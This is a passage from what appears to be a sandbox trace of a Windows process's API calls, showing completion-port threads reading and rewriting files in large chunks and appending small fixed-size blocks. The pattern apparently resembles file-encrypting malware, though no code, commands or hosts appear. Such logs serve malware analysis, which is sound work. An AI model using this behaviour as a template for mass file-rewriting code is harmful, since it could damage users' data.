lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.626] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.627] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.627] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.628] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.630] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.632] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.632] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.641] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.643] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.644] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.644] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.645] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.659] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.660] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.661] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.673] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.675] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.676] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.676] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.678] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.679] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.681] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.681] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.690] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.691] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x60012, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.693] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.693] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0142.693] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0142.693] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0142.693] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.693] WriteFile (in: hFile=0x610, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.693] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.693] CloseHandle (hObject=0x610) returned 1 [0142.998] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0142.999] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0147.522] ReadFile (in: hFile=0x65c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0147.523] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0147.690] ReadFile (in: hFile=0x660, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x4280020) returned 1 [0147.691] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0147.709] WriteFile (in: hFile=0x654, lpBuffer=0x4790124*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4790020) returned 1 [0147.720] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0147.720] WriteFile (in: hFile=0x628, lpBuffer=0x4940124*, nNumberOfBytesToWrite=0x17930, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4940020) returned 1 [0147.729] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0147.733] WriteFile (in: hFile=0x660, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4280020) returned 1 [0147.748] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0147.752] CloseHandle (hObject=0x61c) returned 1 [0147.757] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0147.758] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0147.761] CloseHandle (hObject=0x624) returned 1 [0147.771] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4820020) returned 1 [0147.771] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.008] WriteFile (in: hFile=0x648, lpBuffer=0x4820124*, nNumberOfBytesToWrite=0x7b46, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4820020) returned 1 [0148.015] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0148.015] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0148.015] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0148.015] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0148.015] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.015] WriteFile (in: hFile=0x64c, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2f30020) returned 1 [0148.021] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0148.021] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0148.021] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0148.022] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0148.022] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.022] CloseHandle (hObject=0x64c) returned 1 [0148.049] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0148.050] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.050] CloseHandle (hObject=0x61c) returned 1 [0148.064] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0148.064] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.064] CloseHandle (hObject=0x644) returned 1 [0148.070] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4a60020) returned 1 [0148.070] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.118] ReadFile (in: hFile=0x644, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x2f30020) returned 1 [0148.119] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.119] WriteFile (in: hFile=0x644, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0xbf7e, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2f30020) returned 1 [0148.137] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.137] ReadFile (in: hFile=0x61c, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x4280020) returned 1 [0148.137] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.137] ReadFile (in: hFile=0x644, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0148.138] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.138] WriteFile (in: hFile=0x61c, lpBuffer=0x4280124, nNumberOfBytesToWrite=0xd578, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4280020) returned 0x0 [0148.142] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.142] WriteFile (in: hFile=0x644, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x2f30020) returned 1 [0148.160] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 0 [0148.160] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0148.160] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0148.160] CloseHandle (hObject=0x644) returned 1 [0148.165] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0148.165] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0149.002] CloseHandle (hObject=0x674) returned 1 [0149.031] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0149.032] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0149.032] CloseHandle (hObject=0x650) returned 1 [0149.060] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4820020) returned 1 [0149.060] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0149.060] ReadFile (in: hFile=0x630, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0149.060] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0149.060] WriteFile (in: hFile=0x630, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x71f9, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0149.064] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0149.066] ReadFile (in: hFile=0x630, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0149.066] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0150.014] WriteFile (in: hFile=0x664, lpBuffer=0x55a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x55a0020 | out: lpBuffer=0x55a0094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x55a0020) returned 1 [0150.019] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0150.019] CloseHandle (hObject=0x134) returned 1 [0150.027] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4ca0020) returned 1 [0150.027] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0150.027] CloseHandle (hObject=0x2e0) returned 1 [0150.038] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5000020) returned 1 [0150.038] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0150.814] WriteFile (in: hFile=0x66c, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x4280020) returned 1 [0150.824] GetQueuedCompletionStatus 